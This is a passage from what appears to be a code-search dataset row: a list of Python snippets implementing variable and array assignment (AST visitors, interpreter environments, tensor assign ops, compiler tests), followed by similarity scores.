self.globals_.pop(\"builtins\", None)", "def __setitem__(self, item, value):\n self.vars[item] = value", "def test_variable_assign(self):\n self.trace('x = 1')\n\n events = self.variable_events\n self.assertEqual(len(events), 1)\n event = events[0]\n self.assertIsInstance(event, TraceAssign)\n self.assertEqual(event.name, 'x')\n self.assertEqual(event.value, 1)", "def test_45_assign_statement(self):\n\t\tinput = \"\"\"var x,y:integer;\n\t\tprocedure main(); var x:real; begin x:=1;\n\t\twith y:integer;y:real; do begin end end\"\"\"\n\t\texpect = \"Redeclared Variable: y\"\n\t\tself.assertTrue(TestChecker.test(input,expect,445))", "def update_variable_array(array,annuli,times,t,r,value):\n annulus=radius_to_annulus(r,annuli)\n annulus_start=np.sum(times[0:annulus])\n array[annulus_start+t]=value\n return ()", "def f_setvar(self, name, expr):\r\n self.locals_ptr[name] = self.eval(expr, self.locals_ptr)\r\n return \"\"", "def assign(self, *args):\n return _ida_hexrays.cinsn_t_assign(self, *args)", "def single_assignment_handler(target, value, assign_stmts, node, id_str):\n #print(\"single_assignment_handler\")\n\n temp_stmts = core_language.create_Assign(target, value)\n if hasattr(node, 'lineno'):\n temp_stmts.lineno = node.lineno\n temp_stmts.col_offset = node.col_offset\n\n assign_stmts.append(temp_stmts)\n return False", "def special_setitem(self, form):\n obj = self.reallyCompile(form[1])\n key = self.reallyCompile(form[2])\n value = self.reallyCompile(form[3])\n return ast.Assign([ast.Subscript(obj,\n 'OP_ASSIGN',\n [key])],\n value)", "def visit_Assign(self, node):\n var_name = node.left.token.value\n self.GLOBAL_SCOPE[var_name] = self.visit(node.right)", "def assign(self, name, values):\n self._assignments[name] = values", "def 
genAssign(self, varList, dataVariableName):\n\n tmpVar = self.genVar('tmp')\n #tmpVar = iter(dataVariableName)\n initPart = [tmpVar.assign( Call(Name('iter', Load()), [Name(dataVariableName, Load())], [], None, None))]\n\n moreVars = []\n affectations = []\n assignations = []\n for i, n in enumerate(varList.elts):\n myTmpName = self.genVar(i)\n affectations += [\n #tmpVar_<i> = tmpVar.next()\n myTmpName.assign( Call(tmpVar.load('next'), [], [], None, None ))\n ]\n\n if isinstance(n, Tuple) or isinstance(n, List):\n moreVars.append( (n, myTmpName.name) )\n else:\n assignations += [\n #var = tmpVar_<i>\n Assign( [n], myTmpName.load() )\n ]\n\n tryAssign = [\n # #try: affectations\n # TryExcept(\n # affectations,\n # #except StopIteration:\n # [ExceptHandler( Name('StopIteration', Load()), None, [\n # #raise ValueError(\"need more value to unpack\")\n # Raise(Call(Name('ValueError', Load()), [Str(\"need more value to unpack\")], [], None, None), None, None),\n # ]\n # )],\n # [])\n ]\n\n testMoreValue = [\n #try:\n TryExcept(\n #tmpVar.next()\n [ Expr(Call(tmpVar.load('next'), [], [], None, None )) ],\n #except StopIteration: pass\n [ExceptHandler( Name('StopIteration', Load()), None, [Pass()]) ],\n #else : raise ValueError(\"too many values to unpack\")\n [\n Raise(Call(Name('ValueError', Load()), [Str(\"too many values to unpack\")], [], None, None), None, None),\n\n ])\n ]\n\n return (initPart + tryAssign + testMoreValue, assignations, moreVars)", "def set_params(self, arr):\n self.arr = arr", "def val_at(self, *args, **kwargs):\n self.add_pc(1)\n self.pb[self.pc - 1] = \"ASSIGN\", _m(self.ss_i(0), \"@\"), _m(self.ss_i(0))", "def syntax_var_assign():\n a = 'Hello'\n print(f'{a} is stored at {hex(id(a))}')\n a = \"World\"\n print(f'{a} is stored at {hex(id(a))}')\n\n ## Output\n # Hello is stored at 0x10d251340\n # World is stored at 0x10d251378\n\n ## Notes\n # id()\n # Return the “identity” of an object. 
This is an integer (or long integer) which is guaranteed\n # to be unique and constant for this object during its lifetime.", "def assign_value(values, box, value):\n values[box] = value\n if len(value) == 1:\n assignments.append(values.copy())\n return values", "def assign_value(values, box, value):\n values[box] = value\n if len(value) == 1:\n assignments.append(values.copy())\n return values", "def assign_value(values, box, value):\n values[box] = value\n if len(value) == 1:\n assignments.append(values.copy())\n return values", "def assign_value(values, box, value):\n values[box] = value\n if len(value) == 1:\n assignments.append(values.copy())\n return values", "def assign_value(values, box, value):\n values[box] = value\n if len(value) == 1:\n assignments.append(values.copy())\n return values", "def visit_Assign(self, node):\n assign_stmts = []\n value = node.value\n reversed_targets = node.targets\n reversed_targets.reverse()\n assign_stmts.append(stypy_functions.create_blank_line())\n if len(reversed_targets) > 1:\n assign_stmts.append(\n stypy_functions.create_src_comment(\n \"Multiple assignment of {0} elements.\".format(len(reversed_targets))))\n else:\n if hasattr(node, 'lineno'):\n assign_stmts.append(stypy_functions.create_src_comment(\n \"Assigning a {1} to a {0} (line {2}):\".format(type(reversed_targets[0]).__name__,\n type(value).__name__, node.lineno)))\n else:\n assign_stmts.append(stypy_functions.create_src_comment(\n \"Assigning a {1} to a {0}:\".format(type(reversed_targets[0]).__name__,\n type(value).__name__)))\n for assign_num in xrange(len(reversed_targets)):\n target = reversed_targets[assign_num]\n # Function guard is true? execute handler\n for handler_func_guard_tuple in self.__assignment_handlers:\n if handler_func_guard_tuple[0](target, value):\n id_str, handler_func = handler_func_guard_tuple[1]\n self.performed_transformations |= handler_func(target, value, assign_stmts, node, id_str)\n assign_stmts = stypy_functions.flatten_lists(assign_stmts)\n value = target\n break\n\n if len(assign_stmts) > 0:\n return assign_stmts\n return node", "def assign(self, *args):\n return _ida_hexrays.cif_t_assign(self, *args)", "def set_variable_values(self, vars_values):\n raise NotImplementedError()", "def create_new_vararray_core(cfg_set,var):\r\n if cfg_set[\"source_dict\"][var]==\"METADATA\":\r\n return\r\n \r\n t1 = datetime.datetime.now()\r\n if cfg_set[\"verbose\"]: print(\" ... 
new \"+var+\" array created in:\")\r\n filename = path_creator_vararr(\"orig\",var,cfg_set)\r\n vararr = np.zeros((cfg_set[\"n_integ\"],)+cfg_set[\"xy_ext\"])\r\n \r\n ## Get field of every time step (if map-function cannot be applied)\r\n i = 0\r\n t_delta = np.array(range(cfg_set[\"n_integ\"]))*datetime.timedelta(minutes=cfg_set[\"timestep\"])\r\n if var == \"TRT\":\r\n vararr = get_vararr_TRT_t0(cfg_set[\"t0\"], cfg_set)\r\n else:\r\n for t_d in t_delta:\r\n t_current = cfg_set[\"t0\"] - cfg_set[\"time_change_factor\"]*t_d\r\n vararr_t = get_vararr_t(t_current, var, cfg_set)\r\n vararr[i,:,:] = vararr_t[0,:,:]\r\n i += 1\r\n save_file(filename, data_arr=vararr,var_name=var,cfg_set=cfg_set)\r\n if cfg_set[\"verbose\"]: print(\" \"+filename)\r\n \r\n ## In case verification of displacements should be performed, also initialise skill-score array:\r\n if cfg_set[\"verify_disp\"]:\r\n filename_verif = \"%stmp/%s_%s_%s_verif.npy\" % (cfg_set[\"root_path\"],\r\n cfg_set[\"verif_param\"],str(cfg_set[cfg_set[\"verif_param\"]]), var)\r\n verif_array = np.zeros((1,len(cfg_set[\"scores_list\"]),cfg_set[\"n_integ\"]-1))-9999.\r\n np.save(filename_verif, verif_array)\r\n \r\n t2 = datetime.datetime.now()\r\n if False: print(\" Elapsed time for creation of variable %s: %s\" % (var,str(t2-t1)))", "def test_array_destructuring():\n assert not _do_test_raw(\"\"\"\n [a, b, c, d] = [1, 2, 3, 4];\n [] = bar();\n \"\"\").failed()\n\n assert not _do_test_raw(\"\"\"\n function foo(x, y, [a, b, c], z) {\n bar();\n }\n \"\"\").failed()", "def setValue(self,variable,value):\n for adjective_key in value:\n variable.adjectives[adjective_key].membership = value[adjective_key]\n return None", "def push(self, name, var, timeout=None, verbose=True):\r\n if isinstance(name, str):\r\n name = [name]\r\n var = [var]\r\n\r\n for n, v in zip(name, var):\r\n self.feval(\"assignin\", \"base\", n, v, nout=0, timeout=timeout, verbose=verbose)", "def set_variables(self, new_variables: np.array):\n pass", "def assign(self, dst, req, src):\n if req == 'null':\n return\n if req in ('write', 'inplace'):\n dst[:] = src\n elif req == 'add':\n dst[:] += src", "def assign(self, var, value):\n\t\tself._root = self._insert(self._root, var, value)", "def convert_assign(g, op, block):\n\n out = g.get_node(op.input(\"X\")[0])\n g.add_node(op.output(\"Out\")[0], out)", "def assign_to_env(self, line):\n tag = line[0]\n value = line[2::]\n self.env[tag] = self.eval_sub_statement(value)", "def setitem(ary, loc, value):\n\n if not isinstance(loc, tuple):\n loc = (loc,)\n\n # Let's try to convert non-arrays and non-scalars to an array\n # e.g. 
converting a python list to an array\n if not (bhary.check(value) or np.isscalar(value)):\n value = array_create.array(value)\n\n # Lets make sure that not all dimensions are indexed by integers\n loc = list(loc)\n if len(loc) == ary.ndim and all((np.isscalar(s) for s in loc)):\n # 'slice' doesn't support negative start index\n if loc[0] < 0:\n loc[0] += ary.shape[0]\n loc[0] = slice(loc[0], loc[0] + 1)\n\n # Copy the 'value' to 'ary' using the 'loc'\n if ary.ndim == 0:\n assign(value, ary)\n else:\n assign(value, ary[tuple(loc)])", "def set_value(self, var_name, new_value, tf_session):\n\n if(var_name in self.assign_operator):\n\n tf_session.run(\n self.assign_operator[var_name], {\n self.l_param_input[var_name]: new_value})\n else:\n print(\"Thou shall only assign learning parameters!\")", "def convert_assign_value(g, op, block):\n\n keys = [\"bool_values\", \"fp32_values\", \"int32_values\", \"int64_values\"]\n dtypes = [\"bool\", \"float32\", \"int32\", \"int64\"]\n for i, key in enumerate(keys):\n dtype = dtypes[i]\n value = np.array(op.attr(key)).astype(dtype)\n if value is not None and value.size >= 1:\n break\n shape = op.attr(\"shape\")\n value = value.reshape(shape)\n out = _op.const(value, dtype=dtype)\n g.add_node(op.output(\"Out\")[0], out)", "def assign_from_values_fn(var_names_to_values):\n assign_op, feed_dict = assign_from_values(var_names_to_values)\n def callback(session):\n return session.run(assign_op, feed_dict)\n return callback", "def test_setitem(self, env: yaenv.Env):\n assert 'NEW_VAR' not in env\n env['NEW_VAR'] = 'new_var'\n assert env['NEW_VAR'] == 'new_var'\n env['NEW_VAR'] = 'newer var'\n assert env['NEW_VAR'] == 'newer var'", "def do_assign(parser, token):\n bits = token.contents.split()\n if len(bits) != 3:\n raise template.TemplateSyntaxError(\"'%s' tag takes two arguments\" % bits[0])\n value = parser.compile_filter(bits[2])\n return AssignNode(bits[1], value)", "def do_assign(parser, token):\n bits = token.contents.split()\n if len(bits) != 3:\n raise template.TemplateSyntaxError(\"'%s' tag takes two arguments\" % bits[0])\n value = parser.compile_filter(bits[2])\n return AssignNode(bits[1], value)", "def __setitem__(self, key: str, value: Any) -> None:\n self.variables[key] = value", "def _setitem_for_tensor_array(var, item, value):\n\n from .framework import Variable\n\n assert (\n not paddle.in_dynamic_mode()\n ), \"setitem for tensor_array must be called in static graph mode.\"\n if isinstance(item, (Variable, int)):\n from paddle.jit.dy2static.variable_trans_func import (\n to_static_variable,\n )\n from paddle import cast\n from paddle.tensor import array_write\n\n item = paddle.cast(to_static_variable(item), dtype='int64')\n value = to_static_variable(value)\n return array_write(x=value, i=item, array=var)\n else:\n raise NotImplementedError(\n \"Only support __setitem__ by Int/Variable in tensor_array, but gets {}\".format(\n type(item)\n )\n )", "def assign(self, other):\n\n assert isinstance(other, VarList)\n assert len(self) == len(other)\n ops = []\n for (my_var, other_var) in zip(self.vars_, other.vars_):\n ops.append(my_var.assign(other_var))\n return tf.group(*ops, name=\"assign_\"+self.name)", "def tset(self, parametername, value_array):\n raise NotImplementedError", "def visit_Assign(self, node):\n self.generic_visit(node)\n target = get_single_target(node)\n if isinstance(target, ast.Attribute):\n args = [ target.value, ast.Str(target.attr), node.value ]\n return ast.Expr(to_call(to_name('setattr'), args))\n return node", "def 
test_list_assign(self):\r\n def local_test(x,y):\r\n m1=Module()\r\n\r\n #create a list with some variables in it\r\n m1.l=[x(), y()]\r\n\r\n # create a Method that makes the second list element a shared Member\r\n m1.f=Method([], m1.l[1])\r\n m1.g=Method([], m1.l[0])\r\n m = m1.make()\r\n\r\n #assign 4 and 5 to the two variables' containers in m\r\n m.l = [4, 5]\r\n m.f()\r\n assert numpy.all(5 == m.f())\r\n assert numpy.all(4 == m.g())\r\n\r\n local_test(lambda:T.dscalar(),lambda:T.dscalar())", "def visit_Assign(self, node: Assign) -> None:\n\n node_type = type(node.right).__name__\n if isinstance(node.right, String):\n self._create_instruct(node_type)\n self.visit(node.left)\n instruct = self.visit(node.right)\n c_str = self.builder.alloca(instruct.type)\n self.builder.store(instruct, c_str)\n self.builder.ret_void()\n else:\n self._create_instruct(node_type)\n self.visit(node.left)\n instruct = self.visit(node.right)\n self.builder.ret(instruct)\n\n self.GLOBAL_MEMORY[node.left.value] = instruct", "def let(self, var, val):\n\n self.d['__vstemp'] = val\n if var.endswith('+'):\n rvar = var.rstrip('+')\n # .. obj = eval(rvar,self.d)\n exec(\"%s.append(__vstemp)\" % rvar, self.d)\n else:\n exec(var + \" = __vstemp\", self.d)\n del self.d['__vstemp']", "def variability(sv):\r\n unchanging(sv) # remove change clause for constants \r\n make_volatiles(sv) # create list of volatile objects and make their clause Always\r", "def __setitem__(self, name, variable):\n vec = h.Vector()\n self._vectors[name] = vec\n vec.record(variable)", "def set_variable_value(var, val, env):\n def env_loop(environment):\n \"\"\"\n calls scan on each frame in the env list\n \"\"\"\n def scan(vars, vals):\n \"\"\"\n scans variables in a frame\n \"\"\"\n if isNull(vars):\n return env_loop(enclosing_env(environment)) # 5-4: env -> environment\n elif var == car(vars):\n return set_car(vals, val) #4-15\n else:\n return scan(cdr(vars), cdr(vals)) # 4-15\n if environment is the_empty_environment:\n raise UnboundLocalError(\"lookup_variable\")\n frame = first_frame(environment)\n return scan(frame_variables(frame), frame_values(frame)) # 4-15\n return env_loop(env) # 4-15", "def test_test_arraypointertype(self):\n input = \"\"\"\n void main () {\n float arr[3];\n arr[2]=1.5;\n foo(arr);\n arr[2] = foo(arr)[2] + 1.1;\n putFloatLn(arr[2]);\n }\n float[] foo(float x[]){\n x[2] = 5.1;\n return x;\n }\n \"\"\"\n expect = \"6.2\\n\"\n self.assertTrue(TestCodeGen.test(input,expect,571))", "def verify_assign(self, d_stmt, table):\n lvalue = DanaExpr.factory(d_stmt.find_first_child(\"p_lvalue\"), table)\n expr = DanaExpr.factory(d_stmt.find_first_child(\"p_expr\"), table)\n self.exprs = [lvalue, expr]\n\n expr.type.check_type(d_stmt.linespan, lvalue.type)\n expr.type.in_types(d_stmt.linespan, [DanaType(\"int\"), DanaType(\"byte\")])", "def _set_array(self, name, value, index=None):\n util.set_array_if_not_same(self._arrays[name], value, index)", "def assign_from_values(var_names_to_values):\n feed_dict = {}\n assign_ops = []\n\n for var_name in var_names_to_values:\n var_value = var_names_to_values[var_name]\n var = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES, var_name)\n if not var:\n raise ValueError('Variable %s wasn\\'t found' % var_name)\n elif len(var) > 1:\n # tf.get_collection is just a filter on the prefix: find the exact match:\n found = False\n for v in var:\n if v.op.name == var_name:\n var = v\n found = True\n break\n\n if not found:\n raise ValueError('Variable %s doesn\\'t uniquely identify a variable' %\n 
var_name)\n else:\n var = var[0]\n\n # TODO(nsilberman): ensure placeholder and assign are on the same device.\n # Assign a placeholder to the value that will be filled later.\n placeholder_name = 'placeholder/' + var.op.name\n placeholder_value = array_ops.placeholder(\n dtype=var.dtype.base_dtype,\n shape=var.get_shape(),\n name=placeholder_name)\n assign_ops.append(var.assign(placeholder_value))\n\n feed_dict[placeholder_value] = var_value.reshape(var.get_shape())\n\n assign_op = control_flow_ops.group(*assign_ops)\n return assign_op, feed_dict", "def assigninput(self, input):\n if type(input) == str: # string type\n self.name = input\n else: # array, list, tuple\n if len(input) == 2:\n print input[0], 'input0'\n try:\n n = len(input[0])\n except:\n n = 1\n if n == 1:\n\t\t print 'INITIALIZING SPARSE ARRAY TO ZEROS'\n self.ny, self.nx = input\n input = zeros(input, int)\n ## BELOW NOT QUITE RIGHT...\n ## ACTUALLY IT JUST TAKES LONG TO BUILD THE HUGE ARRAY\n # TAKES TIME TO UNRAVEL\n # LET'S JUST MAKE IT RIGHT THE FIRST TIME:\n #input = zeros(input[0] * input[1], 'int')\n #self.data = input\n self.data = ravel(array(input)) # ravel ADDED MUCH LATER" ]
[ "0.6699032", "0.6667143", "0.66010433", "0.64327574", "0.6394654", "0.632295", "0.62098926", "0.61762494", "0.6125874", "0.6119721", "0.60467184", "0.6016822", "0.5979976", "0.5958759", "0.58768624", "0.57980937", "0.5793912", "0.5786944", "0.57581115", "0.5734274", "0.573222", "0.57276773", "0.57172596", "0.5700201", "0.56997126", "0.56997126", "0.56997126", "0.56997126", "0.5676348", "0.56761956", "0.5668733", "0.5668506", "0.5663936", "0.56568664", "0.5607729", "0.5596645", "0.5587593", "0.5581672", "0.55734444", "0.5566223", "0.55657524", "0.5554801", "0.5508019", "0.55037874", "0.54986787", "0.5491426", "0.54799676", "0.54751265", "0.54698944", "0.54549056", "0.5451319", "0.5422456", "0.5392408", "0.5378242", "0.5375109", "0.53619474", "0.5352494", "0.5327749", "0.5319459", "0.53021413", "0.5294553", "0.5294553", "0.5294553", "0.5294553", "0.5294553", "0.5291089", "0.52885437", "0.5287809", "0.5256138", "0.5246083", "0.5228743", "0.52205926", "0.5213194", "0.5201344", "0.5199537", "0.51837945", "0.51811075", "0.5179904", "0.5174761", "0.5162669", "0.51569515", "0.5155051", "0.51455337", "0.51455337", "0.51370096", "0.51175475", "0.511436", "0.51060694", "0.5095767", "0.508991", "0.5076567", "0.5072704", "0.5067847", "0.5066328", "0.50543755", "0.5047216", "0.5042417", "0.5041681", "0.5033837", "0.5028663" ]
0.7048861
0
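The row closed out by the scores above centers on assignment handling, as its negatives show. For contrast with the stmt_* handlers documented in the rows below, here is a purely hypothetical BASIC-style assignment handler in the same shape (stmt_assign, stmt._target, and SymbolType.VARIABLE are assumptions made for illustration; Expression, put_symbol, and SymbolType come from the neighboring rows):

def stmt_assign(executor, stmt):
    # Hypothetical sketch: evaluate the right-hand side, then bind the
    # result to the target name in the executor's symbol table.
    e = Expression()
    value = e.eval(stmt._tokens, symbols=executor._symbols)
    executor.put_symbol(stmt._target, value, SymbolType.VARIABLE, arg=None)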
Declares an array. Initializes it to zeros. TODO: Handle more than two dimensions.
def stmt_dim(executor, stmt: ParsedStatementDim):
    for name, value in stmt._dimensions:
        initializer = init_array(value)
        executor.put_symbol(name, initializer, SymbolType.ARRAY, arg=None)  # Not right, but for now.
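stmt_dim delegates allocation to an init_array helper that this row does not include. A minimal sketch of what such a helper might do, assuming the dimensions arrive as a sequence of integer upper bounds and that BASIC arrays are indexed 0..N inclusive; the body below is hypothetical, not the repository's implementation:

def init_array(dimensions):
    # Hypothetical: build a zero-filled list structure for a DIM statement.
    # Handles at most two dimensions, matching the TODO in the query above.
    if len(dimensions) == 1:
        return [0] * (dimensions[0] + 1)
    if len(dimensions) == 2:
        rows, cols = dimensions
        return [[0] * (cols + 1) for _ in range(rows + 1)]
    raise NotImplementedError("more than two dimensions")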
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def zeros_numpy_array(self,\n type_name,\n as_matrix = True):\n if as_matrix:\n return np.zeros((1, self.get_max_id(type_name)), dtype='float32')\n else:\n return np.zeros((self.get_max_id(type_name),), dtype='float32')", "def zero_init(self, shape):\n return np.zeros((shape[0],shape[1]))", "def zeros( cls, dims, typeCode ):\n dims = numpy.array( dims, dtype='i')\n return numpy.zeros( dims, GL_TYPE_TO_ARRAY_MAPPING[typeCode])", "def __array__(self):\n return np.zeros(self.shape, self.dtype)", "def initialize_with_zeros(dim):\n\n ### START CODE HERE ### (≈ 1 line of code)\n w = np.zeros(shape=(dim, 1))\n b = 0\n ### END CODE HERE ###\n\n assert (w.shape == (dim, 1))\n assert (isinstance(b, float) or isinstance(b, int))\n\n return w, b", "def initalize_with_zeros(dim):\n return np.zeros((dim, 1)), 0.0", "def _init_array(self, nClumps, nt=0, dim=0, dtype=float, units=None):\n shape = [nClumps]\n \n if nt > 1:\n \n shape.append(nt)\n \n if dim > 1:\n \n shape.append(dim)\n \n if np.issubdtype(dtype, float):\n \n fill_val = np.nan\n \n elif np.issubdtype(dtype, int):\n \n fill_val = -1\n \n else:\n \n fill_val = 0\n \n outarray = SimArray(fill_val*np.ones(shape, dtype=dtype), units)\n \n return outarray", "def init_array(self, data_shape, chunk_size, dtype, chan_names, clims, overwrite=False):\n self.dtype = np.dtype(dtype)\n\n self.set_channel_attributes(chan_names, clims)\n self.current_pos_group.zeros(\n ARRAY_NAME,\n shape=data_shape,\n chunks=chunk_size,\n dtype=dtype,\n compressor=self.__compressor,\n overwrite=overwrite,\n )", "def clear(self):\n self.array = np.zeros(shape=(0, 2))", "def __init__(self):\n self.X = np.zeros((0, 2))", "def __call__(self, shape):\n return np.zeros(shape)", "def zero(self):\n return np.zeros([self.nx])", "def __init__(self):\n self._size = 0 # count actual elements\n self._capacity = 1 # default array capacity\n self._Array = self._make_array(self._capacity) # low-level array", "def zeros(dim):\n\n return np.zeros(dim, dtype='uint8')", "def zeros(shape, dtype=None):\n raise NotImplementedError", "def zeros(cls,size:(int,int)) -> 'Matrix': #note single quotes because this is the class, itself and has not been completely defined yet.\n N = size[0]\n M = size[1]\n\n assert N>0 and M>0, \"N and M must be positive.\"\n return cls([[0 for col in range(M)] for row in range(N)])", "def init_one_d_array(len, val):\n return [val for i in range(len)]", "def _build(self):\n ary = np.zeros( (3,3,3), float )\n ary[0,0,0] = ary[1,1,1] = ary[0,1,2] = ary[1,0,2] = 1.\n ary[0,2,0] = ary[0,2,2] = ary[2,0,0] = ary[2,0,2] = 0.5\n ary[1,2,1] = ary[1,2,2] = ary[2,1,1] = ary[2,1,2] = 0.5\n ary[2,2,0] = ary[2,2,1] = 0.25\n ary[2,2,2] = 0.5\n return ary", "def value_zeros(self, shape):\r\n return numpy.zeros(shape, dtype=self.dtype)", "def initialize_with_zeros(dim):\n \n w = np.zeros([dim, 1])\n b = 0;\n\n assert(w.shape == (dim, 1))\n assert(isinstance(b, float) or isinstance(b, int));\n \n return w,b;", "def zeros(shape, dtype=None, order='C'):\n a = ndarray.__new__(matrix, shape, dtype, order=order)\n a.fill(0)\n return a", "def __init__(self):\n self.array = [None] * 1543", "def init_data(self):\n return np.zeros(self.shape, dtype=bool)", "def __init__(self):\n self.array = None\n pass", "def init_zero_matrix(self,rows,cols):\n\t\ttmpMatrix = []\n\t\tfor i in range(rows):\n\t\t\ttmp = [0 for j in range(cols)]\n\t\t\ttmpMatrix.append(tmp)\n\t\treturn tmpMatrix", "def __init__(self, initial_arr=[]):\n self.arr = initial_arr\n self.size = len(self.arr)", "def __init__(self, 
rows, cols, default_val=0):\n self.num_rows = rows\n self.num_cols = cols\n\n # Initialize the 2-dimensional array\n self.rows = [[default_val] * cols for _ in xrange(rows)]", "def initialize_with_zeros(dim):\n w = np.zeros((dim,1))\n b = 0\n\n assert(w.shape==(dim,1))\n assert(isinstance(b,float) or isinstance(b,int))\n return w, b", "def shared_mem_zero_initializer(shape, dtype, name): # pylint: disable=unused-argument\n data = empty_shared_mem(name, True, shape, dtype)\n dlpack = data.to_dlpack()\n arr = F.zerocopy_from_dlpack(dlpack)\n arr[:] = 0\n return arr", "def initialize_with_zeros(dim):\n\n w = np.zeros((dim, 1))\n b = 0\n\n return w, b", "def zeros(shape, dtype=None):\r\n if not isinstance(shape, (list, tuple, TensorVariable)):\r\n shape = [shape]\r\n if dtype is None:\r\n dtype = config.floatX\r\n return alloc(numpy.array(0, dtype=dtype), *shape)", "def __init__(self, maxSize=3):\r\n try:\r\n if maxSize % 2 == 1 and maxSize >= 3:\r\n self._maxSize = maxSize\r\n else:\r\n raise ValueError(\"maxSize must be an odd integer >= 3\")\r\n except ValueError:\r\n raise\r\n self._data = np.ndarray(0)", "def _setup_ndarrays(self) -> None:\n empty = self.ele_orig * 0\n # 2D arrays\n self.ele = np.copy(self.ele_orig) # Elevation including glaciers\n self.slp = np.copy(empty) # Slope with glacier geometry\n self.asp = np.copy(empty) # Classified aspect with glacier geometry\n self.h = np.copy(empty) # Local glacier height\n self.u = np.copy(empty) # Local glacier velocity\n self.hs = hillshade(\n self.ele_orig,\n self.PLOT_HILLSHADE_AZIMUTH,\n self.PLOT_HILLSHADE_ALTITUDE,\n ) # HS\n\n # Initialize array store\n self.store = ArrayStore()\n self.store.create(\"h\", self.MODEL_RECORD_SIZE)\n self.store.create(\"u\", self.MODEL_RECORD_SIZE)", "def __init__(self):\n self.temperature = np.array([])\n self.salinity = np.array([])\n self.date = np.array([])\n self.temperatureQF = np.array([])\n self.salinityQF = np.array([])", "def set_zero_vector(self):\n self.vector = np.zeros(self.dimension, dtype = float)", "def __init__(self):\n self.arr = []\n for i in range(80):\n self.arr.append([])", "def init_zero(cls, h):\n shapes = Checkpoint.make_shaped_arrays(h)\n return jax.tree_util.tree_map(lambda s: np.zeros(s.shape, s.dtype), shapes)", "def initArrayWithNumbers(self, array):\n for i in range(array.shape[0]):\n array[i][0] = 1\n for j in range(array.shape[1]):\n array[0][j] = 1\n return array", "def __init__(self):\n self.arr = array(\"i\")", "def zeros(shape, dtype=None):\n\n return full(shape, 0, dtype)", "def init_zero(cls, h):\n shapes = QuantizedCheckpoint.make_shaped_arrays(h)\n return jax.tree_util.tree_map(lambda s: np.zeros(s.shape, s.dtype), shapes)", "def __init__(self):\n self._array = None", "def __init__(self):\n self.array = [None for i in range(10000)]", "def initialize(self):\n x0 = [None]*3\n for i in self.free:\n if i=='lengthscale':x0[0]=self.free[i]\n if i=='variance':x0[1]=self.free[i]\n if i=='gstds':x0[2]=self.free[i]\n x0 = [x for x in x0 if x is not None]\n return np.array(x0)", "def empty(shape, dtype=None, order='C'):\n return ndarray.__new__(matrix, shape, dtype, order=order)", "def construct_array_type(cls, *args):\n if len(args) > 0:\n raise NotImplementedError(\"construct_array_type does not support arguments\")\n return FletcherArray", "def __init__(self):\n\n\t\tself.position = np.array([0, 0])", "def zeros(cls, shape, domain):\n func = cls._get_flint_func(domain)\n return cls._new(func(*shape), shape, domain)", "def zeros(shape, ctx=None, dtype=None, stype=None, 
**kwargs):\n\n if stype is None or stype == 'default':\n return _zeros_ndarray(shape, ctx, dtype, **kwargs)\n else:\n return _zeros_sparse_ndarray(stype, shape, ctx, dtype, **kwargs)", "def __init__(self, left_dim, right_dim, num_type='double'):\n super(Wavefunction, self).__init__()\n try:\n self.as_matrix = np.empty((left_dim, right_dim), num_type)\n except TypeError:\n print(\"Bad args for wavefunction\")\n raise\n\n self.left_dim = left_dim\n self.right_dim = right_dim\n self.num_type = num_type", "def zeros_like(self):\n return TightBinding.zeros(self.dims, self.shape)", "def zeros(self):\n super(TimeCube, self).zeros()\n self.data = np.zeros([self.time_range[1]-self.time_range[0]]+self.cubesize, np.uint8)", "def matrix_init(sizex, sizey):\n return [[0]*sizey for i in range(sizex)]", "def zeros(dims,shape):\n return TightBinding({}, dimensions = dims, shape = shape)", "def __init__(self, x, y=None):\n self.len = x\n if y:\n self.size = x * y\n self.data = np.empty((x, y))\n else:\n self.size = self.len\n self.data = np.empty((x,))\n self.idx = 0", "def __init__(self,width=8,height=8):\n\t\tif height > 32 or width < 1 or height < 1:\n\t\t\traise \"Height must be between 1 and 32, width must be greater than 0\"\n\n\t\tself.Width = width\n\t\tself.Height = height\n\t\tself.Grid = [0] * width # we'll use 8 bits of the number in the array", "def zero_vector(cls):\r\n \"\"\" EXECUTE THIS FUNCTION IN THE FARM CLASS! \"\"\"\r\n cls.wzero = np.zeros((Turbine.N, ), dtype=float)", "def initialize(self, dim):\n\n self.w = np.zeros((dim, 1))\n self.b = 0\n\n assert(self.w.shape == (dim, 1))\n assert(isinstance(self.b, float) or isinstance(self.b, int))", "def zeros_like(self):\n return MultiterminalDevice.zeros(\n self.dims,\n self.center.shape,\n tuple(i.shape for i in self.leads),\n self.connections,\n )", "def test_zero_size_array_constructor():\n fcode = \"integer ::\"\n ast = Fortran2003.Ac_Spec(fcode)\n assert isinstance(ast, Fortran2003.Ac_Spec)\n assert isinstance(ast.children[0], Fortran2003.Intrinsic_Type_Spec)", "def __init__(self):\n super(INumpyArrayMetric, self).__init__()\n self.metric = 'INumpyArrayMetric'\n self.ground_truth = None # np.ndarray\n self.segmentation = None # np.ndarray", "def __init__(self, w):\n self.w = np.array(w) if isinstance(w, list) else w\n self.c = np.zeros_like(self.w)", "def test_array(self):\n htype = h5t.py_create(('f',(2,2)))\n self.assertIsInstance(htype, h5t.TypeArrayID)\n self.assertEqual(htype.get_array_dims(), (2,2))", "def zeros_matrix(self, rows, cols):\r\n M = []\r\n while len(M) < rows:\r\n M.append([])\r\n while len(M[-1]) < cols:\r\n M[-1].append(0.0)\r\n\r\n return M", "def initialiseArrays(self):\n self.z_array = np.arange(self.z_start, self.z_end, self.dz)\n # self.gamma_tilde_dash = [self.E(z) / -epsilon_e for z in self.z_array]\n self.gamma_tilde_dash = np.array([norm_E(self.z_array) * self.rf_peak_field * 1e6 / -epsilon_e for norm_E in self.norm_E])\n self.theta_L_array = np.zeros_like(self.z_array)\n self.gamma_dash_array = np.zeros_like(self.z_array)\n self.u_array = np.zeros((len(self.z_array), 4))\n self.M_array = np.zeros((len(self.z_array), 4, 4))\n self.calc_level = INIT_ARRAYS", "def __init__(self, n):\r\n self.size = n\r\n self.mat = []\r\n for i in range(n):\r\n self.mat.append([0] * n)", "def zero_indexed(array):\n if all(dl == 0 for dl in array.datashape.dim_low):\n return array\n if any(dl < 0 for dl in array.datashape.dim_low):\n raise ValueError(\"Cannot zero_index array: one or more \"\n \"dimensions start < 0\")\n\n ds 
